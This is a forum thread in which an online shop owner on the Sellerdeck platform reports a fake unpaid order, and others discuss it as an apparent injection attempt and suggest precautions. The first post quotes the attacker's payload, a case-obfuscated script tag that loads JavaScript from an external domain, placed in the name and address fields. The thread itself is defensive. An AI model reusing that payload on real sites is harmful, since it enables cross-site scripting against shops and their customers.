Announcement

Collapse
No announcement yet.

Strangely Jumbled Data in Order Details

Collapse
X
Collapse
 
  • Page of 1
  • Filter
  • Time
  • Show
Clear All
new posts
Previous template Next
    #1

    Strangely Jumbled Data in Order Details

    I have just received an order (without payment). The buyer's first name is there followed by ">[sCRiPt sRC=//fy.rs/p][/sCrIpT]. In the address the number and street is entered correctly apart from being followed by the same string which also appears on its own in the second address field. The postcode matches the street address, but the phone number is not correct and the email, although apparently in the correct format, bounces back when I tried to contact the customer.

    Is this a Sellerdeck issue, Paypal related (the payment method used) or something odd that the customer is doing?
    Tags: None
    #2
    It sounds to me like something odd the customer is doing and if you combine it with the false email address and phone number I wouldn't consider it a genuine order but more likely someone trying to do something malicious.

    I've no idea what they might have been trying to do, other than maybe use an external script to inject an attack on your server, but as a precaution I would update the website and check the files on your server to make sure there's nothing on there that shouldn't be. Particularly any .htaccess files.
    -----------------------------------------

    First Tackle - Fly Fishing and Game Angling

    -----------------------------------------
    • 1 like

    Comment

      #3
      I had a search on our email confirmations... we had 1 of these... on 11th December 2021, and BACS (no Paypal available on that site)

      My initial guess was the customer used an app to autofill the fields...
      However... we also had no response from our queries.
      • 1 like

      Comment

        #4
        Thanks both. They ordered the first item that shows on the site, so I think it is somebody playing around. I'll write that order off, I think!

        Comment

          #5
          Definitely a hack attempt. A domain name based in Serbia trying to load a JavaScript into your customers browser's checkout form fields so it would be passed on to your site.
          Norman - www.drillpine.biz
          Edinburgh, U K / Bitez, Turkey
          • 1 like

          Comment

            #6
            Originally posted by NormanRouxel View Post
            Definitely a hack attempt. A domain name based in Serbia trying to load a JavaScript into your customers browser's checkout form fields so it would be passed on to your site.
            Thanks Norman. Does this show that the customer's computer is infected in some way? Should I be doing anything to prevent a hack of this sort or does SD not allow this type of attack to work?

            Comment

              #7
              For completeness, I am adding comments from Gary Green at SD responding to a ticket I opened.

              Thanks for contacting SellerDeck software support.

              It is possible that it may have been a potential hack attempt, as it does look similar to an SQL inject attack which will not work with a Sellerdeck site as it does not use SQL or PHP online. Most hacking attempts nowadays are targeted towards Wordpress or Shopify based sites.

              As a precaution it would be wise to change your FTP password, re-upload the site and scan your local computers to see if they were the intended target.

              I have had a look at the .htaccess file and it has not been amended as the timestamp is 2017, additionally opening the file, it does not seem to contain anything unusual.

              I have looked for odd files on the site dated 4th January but as you can appreciate every site is different with custom filenames etc. however I cannot see any file dated 4th January that does not appear legitimate.

              We are not specialists in individual site security so it may be wise to seek out a company that specialises in locating known hacking technique attempts that can scan the site for regularly used stub files.

              Comment

              Previous template Next
              Working...
              X